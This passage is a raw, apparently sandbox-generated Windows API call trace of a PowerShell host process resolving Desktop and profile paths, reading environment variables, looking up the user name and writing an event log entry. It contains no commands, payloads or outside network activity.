[0074.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.629] CoTaskMemFree (pv=0x3e43c0) [0074.630] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.630] CoTaskMemFree (pv=0x3e43c0) [0074.643] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.643] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.643] CoTaskMemFree (pv=0x3e43c0) [0074.644] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.644] CoTaskMemFree (pv=0x3e43c0) [0074.645] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acf70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.645] SetErrorMode (uMode=0x1) returned 0x1 [0074.645] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ad1d0 | out: lpFileInformation=0x1ad1d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.645] SetErrorMode (uMode=0x1) returned 0x1 [0074.645] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acf70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.645] SetErrorMode (uMode=0x1) returned 0x1 [0074.645] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ad1d0 | out: lpFileInformation=0x1ad1d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.645] SetErrorMode (uMode=0x1) returned 0x1 [0074.646] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.646] CoTaskMemFree (pv=0x3e43c0) [0074.650] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.651] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.651] SetErrorMode (uMode=0x1) returned 0x1 [0074.651] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad190 | out: lpFileInformation=0x1ad190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.651] SetErrorMode (uMode=0x1) returned 0x1 [0074.651] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.651] SetErrorMode (uMode=0x1) returned 0x1 [0074.651] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad190 | out: lpFileInformation=0x1ad190*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.652] SetErrorMode (uMode=0x1) returned 0x1 [0074.652] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1acf90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.652] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0074.652] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0074.652] SetErrorMode (uMode=0x1) returned 0x1 [0074.652] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ad190 | out: lpFileInformation=0x1ad190*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0074.652] SetErrorMode (uMode=0x1) returned 0x1 [0074.652] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0074.652] SetErrorMode (uMode=0x1) returned 0x1 [0074.652] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ad190 | out: lpFileInformation=0x1ad190*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0074.653] SetErrorMode (uMode=0x1) returned 0x1 [0074.653] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0074.653] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0074.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.653] SetErrorMode (uMode=0x1) returned 0x1 [0074.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad190 | out: lpFileInformation=0x1ad190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.653] SetErrorMode (uMode=0x1) returned 0x1 [0074.653] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.653] SetErrorMode (uMode=0x1) returned 0x1 [0074.653] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad190 | out: lpFileInformation=0x1ad190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.653] SetErrorMode (uMode=0x1) returned 0x1 [0074.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.654] SetErrorMode (uMode=0x1) returned 0x1 [0074.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ad190 | out: lpFileInformation=0x1ad190*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.654] SetErrorMode (uMode=0x1) returned 0x1 [0074.654] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.654] SetErrorMode (uMode=0x1) returned 0x1 [0074.654] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ad190 | out: lpFileInformation=0x1ad190*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.654] SetErrorMode (uMode=0x1) returned 0x1 [0074.655] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acf90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.655] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.655] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0074.655] SetErrorMode (uMode=0x1) returned 0x1 [0074.655] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ad1d0 | out: lpFileInformation=0x1ad1d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0074.655] SetErrorMode (uMode=0x1) returned 0x1 [0074.655] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0074.656] SetErrorMode (uMode=0x1) returned 0x1 [0074.656] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x1ad1d0 | out: lpFileInformation=0x1ad1d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0074.656] SetErrorMode (uMode=0x1) returned 0x1 [0074.656] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x1acfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0074.656] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0074.656] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.656] SetErrorMode (uMode=0x1) returned 0x1 [0074.656] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad1d0 | out: lpFileInformation=0x1ad1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.656] SetErrorMode (uMode=0x1) returned 0x1 [0074.656] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.657] SetErrorMode (uMode=0x1) returned 0x1 [0074.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x1ad1d0 | out: lpFileInformation=0x1ad1d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.657] SetErrorMode (uMode=0x1) returned 0x1 [0074.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1acfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0074.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.657] SetErrorMode (uMode=0x1) returned 0x1 [0074.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ad1d0 | out: lpFileInformation=0x1ad1d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.657] SetErrorMode (uMode=0x1) returned 0x1 [0074.657] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.657] SetErrorMode (uMode=0x1) returned 0x1 [0074.657] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ad1d0 | out: lpFileInformation=0x1ad1d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.658] SetErrorMode (uMode=0x1) returned 0x1 [0074.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1acfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.660] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x1ad230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0074.660] SetErrorMode (uMode=0x1) returned 0x1 [0074.661] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x1ad490 | out: lpFileInformation=0x1ad490*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4cb2f900, ftLastAccessTime.dwHighDateTime=0x1d61d49, ftLastWriteTime.dwLowDateTime=0x4cb2f900, ftLastWriteTime.dwHighDateTime=0x1d61d49, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0074.661] SetErrorMode (uMode=0x1) returned 0x1 [0074.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.705] CoTaskMemAlloc (cb=0x804) returned 0x1b3d56e0 [0074.705] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3d56e0, nSize=0x1ad7f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad7f8) returned 0x1 [0074.706] CoTaskMemFree (pv=0x1b3d56e0) [0074.706] CoTaskMemAlloc (cb=0x204) returned 0x432650 [0074.706] GetUserNameW (in: lpBuffer=0x432650, pcbBuffer=0x1ad838 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad838) returned 1 [0074.706] CoTaskMemFree (pv=0x432650) [0074.707] ReportEventW (hEventLog=0x1b860008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3dcded0*="Available", lpRawData=0x3dcdc60) returned 1 [0074.707] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.707] CoTaskMemFree (pv=0x3e43c0) [0074.708] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.708] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.708] CoTaskMemFree (pv=0x3e43c0) [0074.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.711] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.711] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0074.711] CoTaskMemFree (pv=0x3e43c0) [0074.711] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.711] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0074.711] CoTaskMemFree (pv=0x3e43c0) [0074.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.711] GetFullPathNameW (in: 